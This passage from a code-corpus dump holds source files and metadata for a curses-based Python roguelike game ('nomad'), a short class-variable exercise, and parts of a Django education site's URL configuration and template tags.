entities.\n update_entities(nomad, plains)\n\n # Game over.\n game_over(stdscr, nomad)\n\n\ndef update_entities(nomad, plains):\n '''Update each `Entity` in the `Plains` with the `Nomad`.'''\n for entity in plains.get_entities():\n entity.update(nomad)\n\n\ndef game_over(stdscr, nomad):\n '''End the game.'''\n stdscr.clear()\n stdscr.addstr(0, 0, \"Game over.\")\n stdscr.addstr(1, 0, \"The nomad's journey has ended.\") \n stdscr.getch()\n curses.endwin()\n\n\ndef player_commands():\n '''Return a dict mapping curses key values to functions that\n should be called when those keys are pressed.\n\n Each function should take a `Nomad` as its single argument.\n '''\n\n def make_move_nomad(dx, dy):\n def move_nomad(nomad):\n nomad.move(dx, dy)\n return move_nomad\n\n # Assign movement keys (from `interface.key_to_dir`).\n commands = dict((key, make_move_nomad(*d))\n for key, d in key_to_dir.items())\n\n def eat_nearest(nomad):\n nomad.as_tactile.eat_nearest()\n\n def pickup_nearest(nomad):\n nomad.as_tactile.pickup_nearest()\n\n def drop_all(nomad):\n nomad.as_tactile.drop_all()\n\n def combine_objects(nomad):\n nomad.as_tactile.combine_objects()\n\n # Assign all other single-key actions.\n commands.update({\n ord('w'): Nomad.wait,\n ord('e'): eat_nearest,\n ord('g'): pickup_nearest,\n ord('d'): drop_all,\n ord('c'): combine_objects,\n })\n\n return commands\n\n\ndef render_info():\n '''Return a dict mapping entity names to rendering data.\n\n Each value is of the form (char, pair_num) where char is the\n character to render and pair_num is a curses color pair number 0-9.\n '''\n return {\n 'nomad': ('@', PAIR_YELLOW),\n 'grass': ('\"', PAIR_GREEN),\n 'flower': ('*', PAIR_BLUE),\n 'earth': 
('.', PAIR_WHITE),\n 'rock': ('0', PAIR_CYAN),\n 'yak': ('Y', PAIR_RED),\n 'mushroom': ('?', PAIR_MAGENTA),\n 'sharp rock': ('>', PAIR_CYAN),\n 'stick': ('/', PAIR_WHITE),\n 'spear': ('|', PAIR_YELLOW),\n }\n\n\ndef init_color_pairs():\n '''Initialize curses color pairs.'''\n for (n, fg_color) in (\n (PAIR_RED, curses.COLOR_RED),\n (PAIR_GREEN, curses.COLOR_GREEN),\n (PAIR_YELLOW, curses.COLOR_YELLOW),\n (PAIR_BLUE, curses.COLOR_BLUE),\n (PAIR_MAGENTA, curses.COLOR_MAGENTA),\n (PAIR_CYAN, curses.COLOR_CYAN),\n (PAIR_WHITE, curses.COLOR_WHITE)):\n curses.init_pair(n, fg_color, -1)\n"
},
{
"alpha_fraction": 0.5684124231338501,
"alphanum_fraction": 0.5711543560028076,
"avg_line_length": 29.383333206176758,
"blob_id": "3afbc56a667cff90577d04b80d12eb8f28de0754",
"content_id": "58ec92f889fcb2a78a0c44d198a1d43e65baa892",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3647,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 120,
"path": "/nomad/entity.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "'''things that exist in the plains'''\nfrom collections import OrderedDict, namedtuple\nfrom itertools import chain\n\nfrom nomad import interface\nfrom nomad.util import DIRECTIONS\n\nclass Stats:\n\n def __init__(self, strength, agility, intelligence):\n self.strength = strength\n self.agility = agility\n self.intelligence = intelligence\n\n\nclass Entity:\n '''A thing that exists in the plains.'''\n\n def __init__(self, name, walkable, moveable=True,\n stats=Stats(strength=1.0, agility=1.0, intelligence=1.0),\n roles={}):\n self.name = name\n self.walkable = walkable\n self.moveable = moveable\n self.stats = stats\n\n self.roles = roles\n for role in self.roles.values():\n role.assign(self)\n\n self.held_entities = []\n\n self.x = None\n self.y = None\n self.z = None\n self.plains = None\n\n def __str__(self):\n '''Return the entity's name.'''\n return self.name\n\n def get_role(self, role_name):\n return self.roles.get(role_name, None)\n\n as_matter = property(lambda self: self.get_role('matter'))\n as_edible = property(lambda self: self.get_role('edible'))\n as_usable = property(lambda self: self.get_role('usable'))\n as_actor = property(lambda self: self.get_role('actor'))\n as_reactor = property(lambda self: self.get_role('reactor'))\n as_mortal = property(lambda self: self.get_role('mortal'))\n as_tactile = property(lambda self: self.get_role('tactile'))\n\n def _get_pos(self):\n return self.x, self.y\n def _set_pos(self, pos):\n self.x, self.y = pos\n pos = property(_get_pos, _set_pos, doc=\n '''Swizzle for (x, y).''')\n\n def select_in_reach(self):\n return interface.ui.select_adjacent_entity()\n \n def get_in_reach(self):\n in_reach = []\n for entity in chain(self.held_entities, [self.get_underfoot()]):\n in_reach.append(entity)\n neighbors = (self.get_adjacent(dx, dy) for dx, dy in DIRECTIONS)\n for entity in neighbors:\n if not entity.walkable:\n in_reach.append(entity)\n return in_reach \n \n def get_underfoot(self):\n '''Return the entity just under this one.'''\n return self.get_adjacent(0, 0, -1)\n\n def get_adjacent(self, dx, dy, dz=None):\n '''Return the entity adjacent to this one in the given x, y, and z\n directions.\n '''\n if dz is None:\n z = -1\n else:\n z = self.z + dz\n return self.plains.get_entity(self.x + dx, self.y + dy, z)\n\n def update(self, nomad):\n '''Update the entity for each of its roles, given a `Nomad`.\n \n A `Role` may provide behavior for this method by overriding\n `Role.update`.\n '''\n for role in self.roles.values():\n if role:\n role.update(nomad)\n\n def put_underfoot(self, entity):\n '''Place an entity just under this one.'''\n if not entity:\n return\n self.plains.add_entity(entity, self.x, self.y, self.z)\n\n def damage(self, dmg):\n damaged = False\n for role in self.roles.values():\n if role:\n damaged = role.damage(dmg) or damaged\n \n def wait(self):\n '''Do nothing.'''\n pass\n\n def move(self, dx, dy):\n '''Move the entity in the given direction.'''\n assert None not in (self.x, self.y, self.plains)\n x = self.x + dx\n y = self.y + dy\n if not self.plains.walkable_at(x, y):\n return\n self.plains.move_entity(self, x, y) \n"
},
{
"alpha_fraction": 0.5177819132804871,
"alphanum_fraction": 0.5233972668647766,
"avg_line_length": 30.895523071289062,
"blob_id": "b48ffbc52001a94b72edf910a19114fd47708330",
"content_id": "04a6f9579296e071873d93a37660f0c88113baa0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4274,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 134,
"path": "/nomad/interface.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "import curses\nfrom curses import KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN\n\nfrom nomad.util import *\n\n# curses color pair numbers (for `init_color_pairs` and `render_info`)\nPAIR_RED = 1\nPAIR_GREEN = 2\nPAIR_YELLOW = 3\nPAIR_BLUE = 4\nPAIR_MAGENTA = 5\nPAIR_CYAN = 6\nPAIR_WHITE = 7\n\nKEY_ENTER = ord(' ')\nKEY_YES = ord('y')\nKEY_NO = ord('n')\n\nui = None\n\nkey_to_dir = flatten_keys({\n (ord('s'),): (0, 0),\n (ord('h'), KEY_LEFT): DIR_LEFT,\n (ord('j'), KEY_DOWN): DIR_DOWN,\n (ord('k'), KEY_UP): DIR_UP,\n (ord('l'), KEY_RIGHT): DIR_RIGHT,\n (ord('y'),): DIR_UPLEFT,\n (ord('u'),): DIR_UPRIGHT,\n (ord('b'),): DIR_DOWNLEFT,\n (ord('n'),): DIR_DOWNRIGHT,})\n\nclass Interface:\n\n def __init__(self, stdscr, plains_win, status_win, nomad, display_dict,\n command_dict):\n self.stdscr = stdscr\n self.plains_win = plains_win\n self.status_win = status_win\n self.nomad = nomad\n self.plains = nomad.plains\n self.display_dict = display_dict\n self.command_dict = command_dict\n\n def select_adjacent_entity(self):\n '''Prompt the player to select an entity adjacent to the nomad.\n\n The player presses the corresponding movement key for the desired\n direction. 's' selects the entity underfoot.\n '''\n # Highlight nomad.\n los = self.nomad.los\n x, y = self.nomad.pos\n self.plains_win.chgat(y + los, x + los, 1, curses.A_REVERSE)\n\n cmd = None\n dx = dy = 0\n while True:\n # Get keyboard input.\n while cmd != KEY_ENTER:\n cmd = self.plains_win.getch()\n if cmd not in key_to_dir:\n continue\n\n self.update_plains_window()\n dx, dy = key_to_dir[cmd]\n self.plains_win.chgat(y + los + dy, x + los + dx, 1,\n curses.A_REVERSE)\n\n if (dx, dy) == (0, 0):\n return self.nomad.get_underfoot()\n else:\n adjacent = self.nomad.get_adjacent(dx, dy)\n if not adjacent.walkable:\n return adjacent\n else:\n return None\n\n \n def update_status_window(self):\n '''Draw some information about a `Nomad` on a window.'''\n self.status_win.clear()\n y = 1\n x = 2\n ystep = 1\n\n self.status_win.addstr(y, x, '---- Nomad -----')\n y += ystep\n\n y += ystep\n self.status_win.addstr(y, x, 'Health: ')\n self.status_win.addstr('{:.0f}'.format(self.nomad.as_mortal.health))\n y += ystep\n self.status_win.addstr(y, x, 'Satiation: ')\n self.status_win.addstr('{:.0f}'.format(self.nomad.as_mortal.satiation))\n y += ystep\n\n y += ystep\n self.status_win.addstr(y, x, 'LH: ')\n self.status_win.addstr(str(self.nomad.as_tactile.held_entities[0]))\n y+= ystep\n self.status_win.addstr(y, x, 'RH: ')\n self.status_win.addstr(str(self.nomad.as_tactile.held_entities[1]))\n\n self.status_win.box()\n self.status_win.refresh()\n\n\n def update_plains_window(self):\n '''Draw a `Plains` on a window, given rendering information.'''\n self.plains_win.clear()\n\n coords = range(self.plains.entities.left,\n self.plains.entities.right + 1)\n # For y, x in the boundary rectangle of the plains\n for y in coords:\n for x in coords:\n # If xy is in the plains, draw the plains at that xy.\n if (x, y) in self.plains.entities:\n entity = self.plains.get_entity(x, y, -1)\n char, color = self.display_dict[entity.name]\n # Otherwise, draw an blank space.\n else:\n char = ' '\n color = PAIR_WHITE\n self.plains_win.addnstr(y + self.plains.entities.down,\n x + self.plains.entities.right,\n char, 1, curses.color_pair(color))\n\n self.plains_win.refresh()\n\n def interact(self):\n key = self.plains_win.getch()\n if key in self.command_dict:\n self.command_dict[key](self.nomad)\n"
},
{
"alpha_fraction": 0.5730336904525757,
"alphanum_fraction": 0.5730336904525757,
"avg_line_length": 16.600000381469727,
"blob_id": "b5d650ef92bd3f9a4572d57fd34bef2c39332322",
"content_id": "42cc5aaacad6ddde57da8fcdbbcf72e28da9f787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/run.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom nomad import game\n\nif __name__ == '__main__':\n game.run()\n\n"
},
{
"alpha_fraction": 0.704827606678009,
"alphanum_fraction": 0.704827606678009,
"avg_line_length": 37.157894134521484,
"blob_id": "1b2d4f7bdc3ed4bd1ca00b5c13908cd9526e71f7",
"content_id": "a49231d97793d4ec48a67ba1e8d00b4e68b71910",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 19,
"path": "/README.rst",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "Nomad\n=====\nAn open-ended, dynamically generated adventure game\n---------------------------------------------------\n\nIn Nomad you play a wandering nomad on an endless, shifting plains that\nchanges as it leaves your line of sight. There is no goal, but the nomad\nmust keep moving in search of food, water, and a safe place to rest.\n\nThere is no telling what the nomad will encounter on the plains, for\nwhat lies abroad is known to no one. On the plains, nothing is certain\nbut this: all paths are one-way.\n\nDevelopment\n...........\n\nNomad works: you can play it until the nomad dies. But there aren't a\nlot of things to do right now. As Nomad evolves its world will become\nricher and something more akin to a game will appear.\n"
},
{
"alpha_fraction": 0.533923327922821,
"alphanum_fraction": 0.5378564596176147,
"avg_line_length": 29.81818199157715,
"blob_id": "0203fda7b16d71a2e9a53217ad777ebe36507357",
"content_id": "c65a67d7d920aa55b610507b36a5ecb0a3ac0727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/nomad/nomad.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "from nomad.entity import Entity, Stats\nfrom nomad.roles import *\nfrom nomad.entities import *\n\n\nclass Nomad(Entity):\n '''The player-controlled entity.'''\n\n object_factory = {\n frozenset(('sharp rock', 'stick')): (3, spear),\n }\n\n def __init__(self, los, stats=Stats(3, 3, 3)):\n '''Initialize the nomad.\n\n :Parameters:\n `los` : int\n How far the nomad sees in any direction. Should be\n equal to the plains' radius, once set.\n '''\n super().__init__('nomad', False, stats, roles=dict(\n mortal=Mortal(),\n tactile=Tactile(self.object_factory)))\n self.los = los\n\n def move(self, dx, dy):\n '''Move the nomad, shifting the plains with it to simulate\n line of sight.\n '''\n if not self.plains.walkable_at(self.x + dx, self.y + dy):\n return\n self.plains.shift(-dx, -dy)\n self.plains.move_entity(self, self.x + dx, self.y + dy)\n"
},
{
"alpha_fraction": 0.5324675440788269,
"alphanum_fraction": 0.5324675440788269,
"avg_line_length": 76,
"blob_id": "27568e65e0ad886087aadb38b44ed7a6fac97849",
"content_id": "996c6d032691b55e898c496b85b661dc3d55b113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 1,
"path": "/nomad/__init__.py",
"repo_name": "dustinrohde/nomad",
"src_encoding": "UTF-8",
"text": "__all__ = ['entity', 'entities', 'game', 'nomad', 'plains', 'roles', 'util']\n"
}
] | 13 |
DerekBishopp/CSCI156-Activity-15
|
https://github.com/DerekBishopp/CSCI156-Activity-15
|
c3c77ac17ec39900c014376d6e292eb901265235
|
16718279979c5cd0c5ceb02653675773637b1557
|
32e8f4481271021471bc27087419c7c1e0f32f05
|
refs/heads/master
| 2021-01-16T22:19:46.071746 | 2014-11-17T20:02:34 | 2014-11-17T20:02:34 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.721611738204956,
"avg_line_length": 22.60869598388672,
"blob_id": "f456e4f0ae9d82e025e23dce03fb8950a31830ab",
"content_id": "161f2e31c8c56292cf2a7492219780f1e4ed8574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 23,
"path": "/Activity 15.py",
"repo_name": "DerekBishopp/CSCI156-Activity-15",
"src_encoding": "UTF-8",
"text": "__author__ = 'Derek'\nimport copy\n\nclass Foo():\n \"\"\"Blahh\"\"\"\n notagoodidea = 'what am I now?'\n\nobject1 = Foo()\n\nobject1.x = 'who knows'\n\nobject2 = object1\n\nobject2.notagoodidea = 'whos on first?'\n\nobject3 = copy.copy(object1)\n\nobject3.notagoodidea = 'im lost'\n\nprint('class variable:',Foo.notagoodidea,id(Foo.notagoodidea))\nprint('instance variable 1:',object1.x,id(object1),id(object1.x))\nprint('instance variable:',object2.notagoodidea,id(object2.notagoodidea))\nprint('instance variable:',object3.notagoodidea,id(object3.notagoodidea))\n\n\n\n"
}
] | 1 |
headrun/notemonk
|
https://github.com/headrun/notemonk
|
4e840bba8c44c6f3ab24faa5e1f1d661af6c6d68
|
e9e05cd03149dc58ac14c9aa8bd31ab54f5bcebb
|
0921a93769c6f9c69a140a1f60f26c5037e2e665
|
refs/heads/master
| 2021-12-14T16:53:42.192363 | 2015-05-08T05:23:28 | 2015-05-08T05:23:28 | 33,764,304 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7511312365531921,
"alphanum_fraction": 0.7556561231613159,
"avg_line_length": 30.571428298950195,
"blob_id": "0783a1684baf03dc2c91976fe91b5a7b2a412d45",
"content_id": "be69f98ed83d7a2d59fe3ea54868a626a4d475df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 7,
"path": "/www/django_wsgi.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os, sys\nos.environ['DJANGO_SETTINGS_MODULE'] = 'www.settings'\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)))\n\nimport django.core.handlers.wsgi\napplication = django.core.handlers.wsgi.WSGIHandler()\n"
},
{
"alpha_fraction": 0.5674558281898499,
"alphanum_fraction": 0.5799824595451355,
"avg_line_length": 50.17647171020508,
"blob_id": "6a194923374720c5207dd45a73a2062aa887db07",
"content_id": "12f2aa300d152c28fff7c916818f8ba54e2a96fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7983,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 153,
"path": "/www/urls.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.conf.urls.defaults import *\r\nfrom django.contrib import admin\r\nfrom django.conf import settings\r\nfrom django.contrib.auth.views import password_reset, password_reset_done\r\nfrom django.contrib.auth.views import password_reset_confirm, password_reset_complete\r\nfrom django.views.decorators.cache import cache_page\r\n\r\n# Pagination url regular expression that extracts\r\n# page_no and num from the url if present\r\nP = '(?:(?P<page_no>[0-9]+)/(?:(?P<num>[0-9]+)/){0,1}){0,1}'\r\n\r\n# Generic Target Url Fragment\r\nT = '(?P<target_type>[0-9]+)/(?P<target>[0-9]+)'\r\n\r\n# Username capture Url Fragment\r\nU = '(?P<username>[:_\\.\\-A-Za-z0-9]+)'\r\n\r\nadmin.autodiscover()\r\n\r\nhandler500 = 'core.views.handler_500'\r\nhandler404 = 'core.views.handler_404'\r\n\r\nurls = patterns('core.views',\r\n url(r'^admin/', include(admin.site.urls)),\r\n\r\n url(r'^ncert/$', 'ncert_view', name='ncert_page'),\r\n url(r'^tamilnadu/$', 'tamilnadu_view', name='tamilnadu_page'),\r\n url(r'^bits_msss/$', 'bits_view', name='bits_page'),\r\n url(r'^anu_books/$', 'anu_view', name='anu_page'),\r\n url(r'^ipe_books/$', 'ipe_view', name='ipe_page'),\r\n url(r'^cbse_books/$', 'cbse_view', name='cbse_page'),\r\n url(r'^aieee_books/$', 'aieee_view', name='aieee_page'),\r\n url(r'^iitjee_books/$', 'iitjee_view', name='iitjee_page'),\r\n url(r'^upsc_books/$', 'upsc_view', name='upsc_page'),\r\n\r\n # background ad popup version page [ bad.html ]\r\n url(r'^bad/$', 'bad_view', name='bad_page'),\r\n\r\n\r\n url(r'^$', 'home_view', name='home_page'),\r\n url(r'', include('social_auth.urls')),\r\n url(r'^login/$', 'login_view', name='login_page'),\r\n url(r'^logout/$', 'logout_user'),\r\n url(r'^fb_login/$', 'fb_login'),\r\n url(r'^accounts/profile/$', 'user_view'),\r\n \r\n url(r'^invite/$', 'invite_view'),\r\n url(r'^email/$', 'email_view', name='email_page'),\r\n\r\n url(r'^tags/$', 'tags_view'),\r\n\r\n url(r'^user/$', 'user_view'),\r\n url(r'^user/edit/$', 'user_edit_view', name='user_edit_page'),\r\n url(r'^user/%s/(?:(?P<a_id>[0-9]+)/){0,1}$' % U, 'user_view', name='user_page'),\r\n url(r'^user/%s/(?P<filter>[a-z_]+)/%s$' % (U, P), 'user_items_view', name='user_items_page'),\r\n \r\n url(r'^books/$', 'books_view', name='books_page'),\r\n url(r'^books/recent/%s$' % P, 'books_recent_view', name='books_recent_page'),\r\n url(r'^books/popular/%s$' % P, 'books_popular_view', name='books_popular_page'),\r\n url(r'^books/tag/(?P<tag>[^/]+)/%s$' % P, 'books_tag_view', name='books_tag_page'),\r\n url(r'^books/tag/all/(?P<tags>.*?)/%s$' % P, 'books_tag_all_view', name='books_tag_all_page'),\r\n url(r'^books/tag/any/(?P<tags>.*?)/%s$' % P, 'books_tag_any_view', name='books_tag_any_page'),\r\n \r\n url(r'^book/add/$', 'book_add_view', name='book_add_page'),\r\n url(r'^book/edit/(?P<book_id>[0-9]+)/$', 'book_edit_view', name='book_edit_page'),\r\n url(r'^book/(?P<book_id>[0-9]+)/', 'book_view', name='book_page'),\r\n url(r'^book/moderators/(?P<book_id>[0-9]+)/%s$' % P, 'book_moderators_view', name='book_moderators_page'),\r\n url(r'^book/request-moderation/(?P<book_id>[0-9]+)/$', 'book_request_moderation_view', name='book_moderation_page'),\r\n url(r'^book/confirm-moderation/(?P<book_id>[0-9]+)/%s/$' % U,\r\n 'book_confirm_moderation_view', name='book_confirm_moderation_page'),\r\n\r\n url(r'^node/(?P<node_id>[0-9]+)/', 'node_view', name='node_page'),\r\n url(r'^video/(?P<avideo_id>[0-9]+)/', 'video_view', name='video_page'),\r\n url(r'^attachment/(?P<attachment_id>[0-9]+)/', 'attachment_view', 
name='attachment_page'),\r\n url(r'^attachment/edit/(?P<attachment_id>[0-9]+)/', 'attachment_edit_view', name='attachment_edit_page'),\r\n url(r'^attachment/add/%s/$' % T, 'attachment_add_view'),\r\n url(r'^image/(?P<image_id>[0-9]+)/', 'image_view', name='image_page'),\r\n\r\n url(r'^note/(?P<note_id>[0-9]+)/$', 'note_view', name='note_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/edit/$', 'note_edit_view', name = 'note_edit_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revisions/%s$' % P, 'note_edit_view'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revision/(?P<revision_id>[0-9]+)/$', 'note_revision_view', name='note_revision_page'),\r\n url(r'^note/(?P<note_id>[0-9]+)/revision/(?P<revision_id>[0-9]+)/revert/$', 'note_revision_revert_view', name='note_revision_revert_page'),\r\n\r\n url(r'^qa/question/$', 'question'),\r\n url(r'^qa/answer/$', 'answer'),\r\n url(r'^qa/question/(?P<q_id>[0-9]+)/', 'question_view'),\r\n\r\n url(r'^add/video/$', 'add_video'),\r\n url(r'^add/image/$', 'add_image'),\r\n url(r'^add/note/$', 'add_note'),\r\n\r\n url(r'^questions/%s/%s' % (T, P), 'questions_view'),\r\n url(r'^images/%s/%s' % (T, P), 'images_view'),\r\n url(r'^videos/%s/%s' % (T, P), 'videos_view'),\r\n url(r'^attachments/%s/%s' % (T, P), 'attachments_view'),\r\n url(r'^notes/%s/%s' % (T, P), 'notes_view'),\r\n\r\n url(r'^activities/all/(?:(?P<a_id>[0-9]+)/){0,1}$', 'activities_view'),\r\n \r\n url(r'^(?P<u_items>[a-z]+)/all/(?P<order>[a-z]+)/%s$' % P, 'allitems_view'),\r\n \r\n url(r'^up/%s/%s' % (T, P), 'uppers_view'),\r\n url(r'^down/%s/%s' % (T, P), 'downers_view'),\r\n url(r'^followers/%s/%s' % (T, P), 'followers_view'),\r\n\r\n url(r'^users/%s' % P, 'users_view'),\r\n url(r'^insert_image/(?:%s/){0,1}$' % T, 'insert_image_view'),\r\n\r\n url(r'^redeemables/%s$' % P, 'redeemables_view'),\r\n url(r'^redeemable/(?P<item_id>[0-9]+)/', 'redeemable_view'),\r\n url(r'^redemption/(?P<r_id>[0-9]+)/$', 'redemption_view', name='redemption_page'),\r\n url(r'^cart/add/(?P<item_id>[0-9]+)/(?:(?P<num_items>[0-9]+)/){0,1}$', 'cart_add_view'),\r\n url(r'^cart/remove/(?P<item_id>[0-9]+)/$', 'cart_remove_view'),\r\n url(r'^cart/checkout/$', 'cart_checkout_view'),\r\n\r\n url(r'^rate/$', 'rate'),\r\n url(r'^follow/$', 'follow'),\r\n url(r'^flag/$', 'flag'),\r\n\r\n url(r'^comment/add/%s/$' % T, 'comment_add_view'),\r\n url(r'^comment/edit/(?P<comment_id>[0-9]+)/$', 'comment_edit_view'),\r\n\r\n url(r'^profilepost/(?P<profilepost_id>[0-9]+)/$', 'profilepost_view'),\r\n url(r'^profilepost/add/(?P<profile_id>[0-9]+)/$', 'profilepost_add_view'),\r\n url(r'^profilepost/edit/(?P<post_id>[0-9]+)/$', 'profilepost_edit_view'),\r\n \r\n url(r'^privacy_policy/$', 'privacy_policy_view'),\r\n url(r'^feedback/$', 'feedback_view'),\r\n url(r'^feedback/sent/$', 'feedback_sent_view', name='feedback_sent_page'),\r\n \r\n url(r'^xd_receiver\\.htm$', 'xd_receiver_view'),\r\n \r\n )\r\n\r\nurlpatterns = urls + patterns('',\r\n (r'^markitup/', include('markitup.urls')),\r\n (r'^notification/$', 'django.views.generic.simple.redirect_to', {'url': '/user/edit/'}),\r\n (r'^notification/', include('notification.urls')),\r\n (r'^accounts/password/reset/$', password_reset, {'template_name': 'registration/_password_reset.html'}),\r\n (r'^accounts/password/reset/done/$', password_reset_done, {'template_name': 'registration/_password_reset_done.html'}),\r\n (r'^accounts/password/reset/confirm/$', password_reset_confirm, {'template_name': 'registration/_password_reset_confirm.html'}),\r\n 
(r'^accounts/password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$', password_reset_confirm, {'template_name': 'registration/_password_reset_confirm.html'}),\r\n (r'^accounts/password/reset/complete/$', password_reset_complete, {'template_name': 'registration/_password_reset_complete.html'}),\r\n (r'^accounts/', include('registration.backends.default.urls')),\r\n (r'^favicon\\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/static/images/favicon-32x32.ico'}),\r\n (r'^robots\\.txt$', 'django.views.generic.simple.redirect_to', {'url': '/static/files/robots.txt'}),\r\n (r'^static/(?P<path>.*)$', 'django.views.static.serve',\r\n {'document_root': settings.MEDIA_ROOT}),\r\n (r'^media/(?P<path>.*)$', 'django.views.static.serve',\r\n {'document_root': settings.ADMIN_MEDIA_ROOT}),\r\n (r'^redeem/$', 'django.views.generic.simple.redirect_to', {'url': '/redeemables/'}),\r\n)\r\n"
},
{
"alpha_fraction": 0.5890060067176819,
"alphanum_fraction": 0.5953740477561951,
"avg_line_length": 31.221698760986328,
"blob_id": "170e3f981a6f6d31985a65e8eb4eb53e931a5673",
"content_id": "a87324c44a92546835a521077095a2aef8bfb70e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13662,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 424,
"path": "/www/core/templatetags/tags.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\nfrom decimal import Decimal\nimport hashlib\nimport colorsys\n\nimport Image as PIL\n\nfrom django import template\nfrom django.db.models.fields.files import FieldFile\nfrom django.template import Library\nfrom django.core.files.base import ContentFile\nfrom django.conf import settings\n\nfrom core.utils import get_doc, HANDLING_CREDITS, parse_flags\nfrom core.models import *\nfrom core.query import get_items_by_tag\n\nNO_IMAGE = '/static/images/no_image_available.gif'\nregister = Library()\n\ndef C(context, c):\n c['request'] = context['request']\n c['user'] = context.get('user', '')\n c['ref_path'] = context.get('ref_path', '')\n return c\n\[email protected]_tag('ui/rate_widget.html', takes_context=True)\ndef rate(context, target):\n user = context['user'] \n \n try:\n rating = target.ratings.get(user=user)\n rating = 'up' if rating.rating == Ratings.UP else 'down'\n except:\n rating = None\n\n return C(context, {'target': target, 'rating': rating})\n\[email protected]_tag('ui/follow_widget.html', takes_context=True)\ndef follow(context, target):\n user = context['user'] \n \n try:\n followed = target.followed_by(user=user)\n except:\n followed = False\n\n return C(context, {'target': target, 'followed': followed})\n\[email protected]_tag('ui/flag_widget.html', takes_context=True)\ndef flag(context, target):\n user = context['user'] \n ref_path = context['ref_path'] \n try:\n flagged = target.flaggers.get(user=user)\n except:\n flagged = False\n\n return C(context, {'target': target, 'flagged': flagged})\n\[email protected]_tag('ui/bookshelf_widget.html', takes_context=True)\ndef bookshelf(context, title, query_type, tags, no_items):\n tags = [t.strip() for t in tags.split(',')]\n books = get_items_by_tag(Book, tags, query_type)\n\n more_link = ''\n if books.count() > no_items:\n tags = '/'.join(tags)\n more_link = '/books/tag/%(query_type)s/%(tags)s/' % locals()\n\n return C(context, {'title': title, 'books': books[:no_items],\n 'more_link': more_link})\n\[email protected]_tag('ui/note_widget.html', takes_context=True)\ndef note(context, target):\n user = context['user']\n user_note = target.user_note(user)\n return C(context, {'user_note': user_note, 'target': target})\n\[email protected]_tag('ui/question_widget.html', takes_context=True)\ndef question(context, target, topic, num):\n markup_widget_id = 'question_text_%d_%d' % (target.ctype.id, target.id)\n return C(context, {'target': target, 'topic': topic, 'num_questions': num,\n 'questions': target.questions.all()[:num],\n 'markup_widget_id': markup_widget_id})\n\[email protected]_tag('ui/profilepost_widget.html', takes_context=True)\ndef profilepost(context, target, topic, num):\n return C(context, {'target': target, 'topic': topic, 'num_posts': num,\n 'posts': target.questions.all()[:num]})\n\[email protected]_tag('ui/bad_script.html', takes_context=True)\ndef background_ad(context, book):\n tags = [t.tag.name for t in book.tags.all()]\n show_ad = False\n\n if 'NCERT' in tags or 'CBSE' in tags or 'Tamil Nadu' in tags:\n if '6th' in tags or '7th' in tags or '8th' in tags or '9th' in tags or '10th' in tags:\n show_ad = False\n\n return C(context, {'show_ad': show_ad, 'tags': tags})\n\[email protected]_tag('ui/comment_widget.html', takes_context=True)\ndef comment(context, target, flags=None):\n flags = parse_flags(flags)\n\n return C(context, {'target': target, 'flags': flags})\n\[email protected]_tag('ui/outline_widget.html', takes_context=True)\ndef outline(context, node, depth):\n subnodes = 
